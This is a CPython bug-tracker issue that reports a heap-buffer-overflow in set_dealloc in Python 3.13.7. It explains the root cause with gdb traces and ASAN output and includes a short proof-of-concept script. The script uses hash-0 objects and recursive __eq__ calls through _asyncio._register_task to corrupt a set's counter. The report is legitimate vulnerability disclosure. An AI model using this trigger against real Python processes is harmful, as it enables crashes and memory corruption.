Skip to content

Navigation Menu

Sign in
Appearance settings

Search code, repositories, users, issues, pull requests...

Provide feedback

We read every piece of feedback, and take your input very seriously.

Saved searches

Use saved searches to filter your results more quickly

Sign up
Appearance settings

heap overflow in set_dealloc (setobject.c) #139071

Open
Assignees
Labels
interpreter-core(Objects, Python, Grammar, and Parser dirs) type-crashA hard crash of the interpreter, possibly with a core dump
@kcatss

Description

Crash report

What happened?

heap overflow by corrupted PySetObject internal data(used)

Version

Python 3.13.7 (main, Sep 14 2025, 14:06:10) [GCC 13.3.0]

Root Cause

  1. CPython PySetObject entry states: Python sets maintain three types of entries:

    • active: successfully inserted entries
    • dummy: entries that were inserted but subsequently deleted
    • unused(null): uninitialized/empty entries

    https://github.com/python/cpython/blob/3.13/Include/cpython/setobject.h#L7-L9

  2. Hash collision exploitation: The hash value is used for both table indexing in set_add_entry and entry comparison. Setting hash to 0 causes deterministic traversal starting from index 0, creating intentional hash collisions between entries.

    https://github.com/python/cpython/blob/3.13/Objects/setobject.c#L144

  3. Dummy entry setup: Two dummy objects that return hash 0 are inserted into the set, then deleted, leaving behind dummy entries.

  4. Recursive eq calls and exception handling: The eq method is the callback executed when set entries have identical hashes to resolve hash collisions. Adding a corruption object triggers recursive calls that eventually hit Python's maximum recursion depth, causing an error return and raising an exception.

    https://github.com/python/cpython/blob/3.13/Objects/setobject.c#L165

  5. Freeslot handling logic: When Python set encounters a dummy entry, it stores the location in freeslot. When it subsequently encounters a null entry, it moves to the dummy_or_freeslot location.

    https://github.com/python/cpython/blob/3.13/Objects/setobject.c#L175-L177

    https://github.com/python/cpython/blob/3.13/Objects/setobject.c#L152-L153

  6. Entry overwrite at dummy_or_freeslot: If an entry's hash matches a dummy's hash, Python writes the key and hash to that dummy entry at the dummy_or_freeslot location.

    https://github.com/python/cpython/blob/3.13/Objects/setobject.c#L185-L191

  7. Exception handling and recursion unwind corruption: Even though the exception is caught and handled with try-except, as the recursion stack unwinds, each recursive call attempts to complete its add_entry operation. Since freeslot was determined deterministically, all recursive calls reference the same memory address. During the unwind process, each level overwrites the same freeslot location and incorrectly increments used += 1, as the function determines the insertion was successful.

recusively overwrite same freeslot location
Breakpoint 3, set_add_entry (so=so@entry=0x5110001dcd20, key=key@entry=<weakref.ReferenceType at remote 0x50b00015e640>, hash=0) at Objects/setobject.c:191
191 return 0;
1: freeslot = (setentry *) 0x5110001dcd60 // same freeslot location
2: x/2xg freeslot
0x5110001dcd60: 0x000050b00015e640 0x0000000000000000
(gdb) py-bt
Traceback (most recent call first):
 File "/home/ubuntu/Python-3.13.7/Lib/_weakrefset.py", line 88, in add
 self.data.add(ref(item, self._remove))
 File "/home/ubuntu/Python-3.13.7/test.py", line 11, in __eq__
 _asyncio._register_task(self)
 File "/home/ubuntu/Python-3.13.7/Lib/_weakrefset.py", line 88, in add
 self.data.add(ref(item, self._remove))
 File "/home/ubuntu/Python-3.13.7/test.py", line 11, in __eq__
 _asyncio._register_task(self)
 File "/home/ubuntu/Python-3.13.7/Lib/_weakrefset.py", line 88, in add
 self.data.add(ref(item, self._remove))
 File "/home/ubuntu/Python-3.13.7/test.py", line 11, in __eq__
 _asyncio._register_task(self)
 File "/home/ubuntu/Python-3.13.7/Lib/_weakrefset.py", line 88, in add
 self.data.add(ref(item, self._remove))
 <built-in method _register_task of module object at remote 0x5080000de5c0>
 File "/home/ubuntu/Python-3.13.7/test.py", line 11, in __eq__
 _asyncio._register_task(self)
 File "/home/ubuntu/Python-3.13.7/Lib/_weakrefset.py", line 88, in add
 self.data.add(ref(item, self._remove))
 <built-in method _register_task of module object at remote 0x5080000de5c0>
 File "/home/ubuntu/Python-3.13.7/test.py", line 23, in <module>
 _asyncio._register_task(a[1])
(gdb) c
Continuing.
Breakpoint 3, set_add_entry (so=so@entry=0x5110001dcd20, key=key@entry=<weakref.ReferenceType at remote 0x50b00015e590>, hash=0) at Objects/setobject.c:191
191 return 0;
1: freeslot = (setentry *) 0x5110001dcd60 // same freeslot location
2: x/2xg freeslot 
0x5110001dcd60: 0x000050b00015e590 0x0000000000000000
(gdb) py-bt // different python stack
Traceback (most recent call first):
 File "/home/ubuntu/Python-3.13.7/Lib/_weakrefset.py", line 88, in add
 self.data.add(ref(item, self._remove))
 File "/home/ubuntu/Python-3.13.7/test.py", line 11, in __eq__
 _asyncio._register_task(self)
 File "/home/ubuntu/Python-3.13.7/Lib/_weakrefset.py", line 88, in add
 self.data.add(ref(item, self._remove))
 File "/home/ubuntu/Python-3.13.7/test.py", line 11, in __eq__
 _asyncio._register_task(self)
 File "/home/ubuntu/Python-3.13.7/Lib/_weakrefset.py", line 88, in add
 self.data.add(ref(item, self._remove))
 <built-in method _register_task of module object at remote 0x5080000de5c0>
 File "/home/ubuntu/Python-3.13.7/test.py", line 11, in __eq__
 _asyncio._register_task(self)
 File "/home/ubuntu/Python-3.13.7/Lib/_weakrefset.py", line 88, in add
 self.data.add(ref(item, self._remove))
 <built-in method _register_task of module object at remote 0x5080000de5c0>
 File "/home/ubuntu/Python-3.13.7/test.py", line 23, in <module>
 _asyncio._register_task(a[1])
(gdb) c
Continuing.
Breakpoint 3, set_add_entry (so=so@entry=0x5110001dcd20, key=key@entry=<weakref.ReferenceType at remote 0x50b00015e4e0>, hash=0) at Objects/setobject.c:191
191 return 0;
1: freeslot = (setentry *) 0x5110001dcd60 // same freeslot location
2: x/2xg freeslot
0x5110001dcd60: 0x000050b00015e4e0 0x0000000000000000
(gdb) py-bt // different python stack
Traceback (most recent call first):
 File "/home/ubuntu/Python-3.13.7/Lib/_weakrefset.py", line 88, in add
 self.data.add(ref(item, self._remove))
 File "/home/ubuntu/Python-3.13.7/test.py", line 11, in __eq__
 _asyncio._register_task(self)
 File "/home/ubuntu/Python-3.13.7/Lib/_weakrefset.py", line 88, in add
 self.data.add(ref(item, self._remove))
 <built-in method _register_task of module object at remote 0x5080000de5c0>
 File "/home/ubuntu/Python-3.13.7/test.py", line 11, in __eq__
 _asyncio._register_task(self)
 File "/home/ubuntu/Python-3.13.7/Lib/_weakrefset.py", line 88, in add
 self.data.add(ref(item, self._remove))
 <built-in method _register_task of module object at remote 0x5080000de5c0>
 File "/home/ubuntu/Python-3.13.7/test.py", line 23, in <module>
 _asyncio._register_task(a[1])
(gdb) c
Continuing.
Breakpoint 3, set_add_entry (so=so@entry=0x5110001dcd20, key=key@entry=<weakref.ReferenceType at remote 0x50b00015e430>, hash=0) at Objects/setobject.c:191
191 return 0;
1: freeslot = (setentry *) 0x5110001dcd60 // same freeslot location
2: x/2xg freeslot
0x5110001dcd60: 0x000050b00015e430 0x0000000000000000
(gdb) py-bt // different python stack
Traceback (most recent call first):
 File "/home/ubuntu/Python-3.13.7/Lib/_weakrefset.py", line 88, in add
 self.data.add(ref(item, self._remove))
 <built-in method _register_task of module object at remote 0x5080000de5c0>
 File "/home/ubuntu/Python-3.13.7/test.py", line 11, in __eq__
 _asyncio._register_task(self)
 File "/home/ubuntu/Python-3.13.7/Lib/_weakrefset.py", line 88, in add
 self.data.add(ref(item, self._remove))
 <built-in method _register_task of module object at remote 0x5080000de5c0>
 File "/home/ubuntu/Python-3.13.7/test.py", line 23, in <module>
 _asyncio._register_task(a[1])
(gdb) c
Continuing.
Breakpoint 3, set_add_entry (so=so@entry=0x5110001dcd20, key=key@entry=<weakref.ReferenceType at remote 0x50b00015e380>, hash=0) at Objects/setobject.c:191
191 return 0;
1: freeslot = (setentry *) 0x5110001dcd60 // same freeslot location
2: x/2xg freeslot
0x5110001dcd60: 0x000050b00015e380 0x0000000000000000
(gdb) py-bt // different python stack
Traceback (most recent call first):
 File "/home/ubuntu/Python-3.13.7/Lib/_weakrefset.py", line 88, in add
 self.data.add(ref(item, self._remove))
 <built-in method _register_task of module object at remote 0x5080000de5c0>
 File "/home/ubuntu/Python-3.13.7/test.py", line 23, in <module>
 _asyncio._register_task(a[1])
(gdb) c
  1. Entry counter bug: This results in the set's used counter being incremented multiple times for what is essentially a single memory location, leading to incorrect set size tracking and potential memory corruption.
entry counter(used : 70 ) bug
Breakpoint 4, set_dealloc (so=0x5110001dcd20) at Objects/setobject.c:495
495 {
1: *(PySetObject *)so = {ob_base = {{ob_refcnt = 0, ob_refcnt_split = {0, 0}}, ob_type = 0x555556228520 <PySet_Type>}, fill = 2, used = 70 //<-- 
, mask = 7, table = 0x5110001dcd60, hash = -1, finger = 0, smalltable = {{key = 0x555556228f40 <_dummy_struct>, hash = -1}, {key = 0x555556228f40 <_dummy_struct>,
 hash = -1}, {key = 0x0, hash = 0}, {key = 0x0, hash = 0}, {key = 0x0, hash = 0}, {key = 0x0, hash = 0}, {key = 0x0, hash = 0}, {key = 0x0,
 hash = 0}}, weakreflist = 0x0}
(gdb) x/8gx 0x5110001dcd60 <-- PySetObject internal table address
0x5110001dcd60: 0x0000555556228f40 0xffffffffffffffff
0x5110001dcd70: 0x0000555556228f40 0xffffffffffffffff
0x5110001dcd80: 0x0000000000000000 0x0000000000000000
0x5110001dcd90: 0x0000000000000000 0x0000000000000000
0x5110001dcda0: 0x0000000000000000 0x0000000000000000
0x5110001dcdb0: 0x0000000000000000 0x0000000000000000
0x5110001dcdc0: 0x0000000000000000 0x0000000000000000
0x5110001dcdd0: 0x0000000000000000 0x0000000000000000
  1. Memory corruption during deallocation: In set_dealloc, the deallocation routine iterates through the table by incrementing addresses sequentially. When it encounters non-dummy entries, it performs cleanup and decrements used--. However, since used is now greater than the actual (fill - dummy) count due to the previous corruption, the deallocation process accesses invalid memory addresses beyond the allocated table bounds, leading to memory corruption or segmentation faults.

    https://github.com/python/cpython/blob/3.13/Objects/setobject.c#L494-L514

POC

import _asyncio
class dummy(object):
 def __hash__(self):
 return 0
class CorrupTrigger():
 def __hash__(self):
 return 0
 def __eq__(self,other):
 try:
 _asyncio._register_task(self)
 except:
 pass
 return False
a = [dummy(),dummy()]
_asyncio._register_task(a[0])
_asyncio._register_task(a[1])
del a # make dummy entries in set 
print (_asyncio._scheduled_tasks)
a = [CorrupTrigger() for i in range(2)]
_asyncio._register_task(a[0])
_asyncio._register_task(a[1]) # make recursive comparision

ASAN

asan
==4613==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x5110001dcdf0 at pc 0x555555a458a5 bp 0x7fffffffdb20 sp 0x7fffffffdb10
READ of size 8 at 0x5110001dcdf0 thread T0
 #0 0x555555a458a4 in set_dealloc Objects/setobject.c:505
 #1 0x555555a0c1dc in _Py_Dealloc Objects/object.c:2939
 #2 0x5555559d8d5a in Py_DECREF Include/object.h:934
 #3 0x5555559d9787 in set_dict_inline_values Objects/dictobject.c:7151
 #4 0x5555559e55ad in _PyObject_SetManagedDict Objects/dictobject.c:7180
 #5 0x5555559e5667 in PyObject_ClearManagedDict Objects/dictobject.c:7222
 #6 0x555555a746da in subtype_dealloc Objects/typeobject.c:2359
 #7 0x555555a0c1dc in _Py_Dealloc Objects/object.c:2939
 #8 0x7ffff6ff7dd8 in Py_DECREF Include/object.h:934
 #9 0x7ffff6ff83a7 in module_clear Modules/_asynciomodule.c:3584
 #10 0x555555a05030 in module_clear Objects/moduleobject.c:1103
 #11 0x555555c3a017 in delete_garbage Python/gc.c:1015
 #12 0x555555c3b4f9 in gc_collect_main Python/gc.c:1421
 #13 0x555555c3c05f in _PyGC_CollectNoFail Python/gc.c:1657
 #14 0x555555ca8fdb in finalize_modules Python/pylifecycle.c:1797
 #15 0x555555cb2079 in _Py_Finalize Python/pylifecycle.c:2134
 #16 0x555555cb21ad in Py_FinalizeEx Python/pylifecycle.c:2261
 #17 0x555555d15c05 in Py_RunMain Modules/main.c:777
 #18 0x555555d15de7 in pymain_main Modules/main.c:805
 #19 0x555555d1616c in Py_BytesMain Modules/main.c:829
 #20 0x5555557de445 in main Programs/python.c:15
 #21 0x7ffff742a1c9 in __libc_start_call_main ../sysdeps/nptl/libc_start_call_main.h:58
 #22 0x7ffff742a28a in __libc_start_main_impl ../csu/libc-start.c:360
 #23 0x5555557de374 in _start (/home/ubuntu/Python-3.13.7/python+0x28a374) (BuildId: c1408b7ecd69be204d23a50df1288230bd9ca6bd)
0x5110001dcdf0 is located 0 bytes after 240-byte region [0x5110001dcd00,0x5110001dcdf0)
allocated by thread T0 here:
 #0 0x7ffff78fd9c7 in malloc ../../../../src/libsanitizer/asan/asan_malloc_linux.cpp:69
 #1 0x555555a15097 in _PyMem_RawMalloc Objects/obmalloc.c:62
 #2 0x555555a14468 in _PyMem_DebugRawAlloc Objects/obmalloc.c:2792
 #3 0x555555a144d0 in _PyMem_DebugRawMalloc Objects/obmalloc.c:2825
 #4 0x555555a16a0a in _PyMem_DebugMalloc Objects/obmalloc.c:2982
 #5 0x555555a3e147 in PyObject_Malloc Objects/obmalloc.c:1400
 #6 0x555555a6ea6f in _PyObject_MallocWithType Include/internal/pycore_object_alloc.h:46
 #7 0x555555a6ea6f in _PyType_AllocNoTrack Objects/typeobject.c:2041
 #8 0x555555a6ebf8 in PyType_GenericAlloc Objects/typeobject.c:2070
 #9 0x555555a47924 in make_new_set Objects/setobject.c:1086
 #10 0x555555a4964c in set_vectorcall Objects/setobject.c:2379
 #11 0x555555bb4e2c in _PyEval_EvalFrameDefault Python/generated_cases.c.h:1123
 #12 0x555555bdc0ae in _PyEval_EvalFrame Include/internal/pycore_ceval.h:119
 #13 0x555555bdc28b in _PyEval_Vector Python/ceval.c:1816
 #14 0x55555595a39b in _PyFunction_Vectorcall Objects/call.c:413
 #15 0x55555595d4eb in _PyObject_VectorcallDictTstate Objects/call.c:135
 #16 0x55555595d910 in _PyObject_Call_Prepend Objects/call.c:504
 #17 0x555555a7debc in slot_tp_init Objects/typeobject.c:9816
 #18 0x555555a719e0 in type_call Objects/typeobject.c:1997
 #19 0x55555595a659 in _PyObject_MakeTpCall Objects/call.c:242
 #20 0x55555595a93a in _PyObject_VectorcallTstate Include/internal/pycore_call.h:166
 #21 0x55555595a96a in PyObject_CallNoArgs Objects/call.c:106
 #22 0x7ffff7004bcc in module_init Modules/_asynciomodule.c:3665
 #23 0x7ffff7004fb8 in module_exec Modules/_asynciomodule.c:3734
 #24 0x555555a06fa6 in PyModule_ExecDef Objects/moduleobject.c:491
 #25 0x555555c5d45a in exec_builtin_or_dynamic Python/import.c:815
 #26 0x555555c5d47d in _imp_exec_dynamic_impl Python/import.c:4770
 #27 0x555555c5de55 in _imp_exec_dynamic Python/clinic/import.c.h:513
 #28 0x555555a02aeb in cfunction_vectorcall_O Objects/methodobject.c:511
 #29 0x55555595db69 in _PyVectorcall_Call Objects/call.c:273
 #30 0x55555595e1a8 in _PyObject_Call Objects/call.c:348
SUMMARY: AddressSanitizer: heap-buffer-overflow Objects/setobject.c:505 in set_dealloc
Shadow bytes around the buggy address:
 0x5110001dcb00: fd fd fd fd fd fd fd fd fd fd fd fd fd fa fa fa
 0x5110001dcb80: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00
 0x5110001dcc00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
 0x5110001dcc80: 00 00 00 00 00 00 fa fa fa fa fa fa fa fa fa fa
 0x5110001dcd00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x5110001dcd80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00[fa]fa
 0x5110001dce00: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00
 0x5110001dce80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
 0x5110001dcf00: 00 00 00 00 00 00 fa fa fa fa fa fa fa fa fa fa
 0x5110001dcf80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
 0x5110001dd000: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
 Addressable: 00
 Partially addressable: 01 02 03 04 05 06 07
 Heap left redzone: fa
 Freed heap region: fd
 Stack left redzone: f1
 Stack mid redzone: f2
 Stack right redzone: f3
 Stack after return: f5
 Stack use after scope: f8
 Global redzone: f9
 Global init order: f6
 Poisoned by user: f7
 Container overflow: fc
 Array cookie: ac
 Intra object redzone: bb
 ASan internal: fe
 Left alloca redzone: ca
 Right alloca redzone: cb
==4613==ABORTING

CPython versions tested on:

CPython main branch

Operating systems tested on:

Linux

Output from running 'python -VV' on the command line:

Python 3.13.7 (main, Sep 14 2025, 14:06:10) [GCC 13.3.0]

Metadata

Metadata

Labels

interpreter-core(Objects, Python, Grammar, and Parser dirs) type-crashA hard crash of the interpreter, possibly with a core dump

Projects

No projects

Milestone

No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions

      AltStyle によって変換されたページ (->オリジナル) /